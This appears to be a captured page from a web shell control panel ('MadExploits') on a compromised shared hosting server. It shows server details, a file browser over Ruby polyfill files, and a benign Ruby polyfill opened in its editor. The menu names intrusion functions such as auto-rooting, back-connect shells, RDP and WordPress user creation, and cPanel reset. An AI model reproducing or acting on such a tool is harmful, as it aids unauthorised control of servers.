Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby34 /
share /
ruby /
prism /
polyfill /
[ HOME SHELL ]
Name
Size
Permission
Action
append_as_bytes.rb
371
B
-rw-r--r--
byteindex.rb
324
B
-rw-r--r--
scan_byte.rb
304
B
-rw-r--r--
unpack1.rb
536
B
-rw-r--r--
warn.rb
987
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : append_as_bytes.rb
# frozen_string_literal: true # Polyfill for String#append_as_bytes, which didn't exist until Ruby 3.4. if !("".respond_to?(:append_as_bytes)) String.include( Module.new { def append_as_bytes(*args) args.each do |arg| arg = Integer === arg ? [arg].pack("C") : arg.b self.<<(arg) # steep:ignore end end } ) end
Close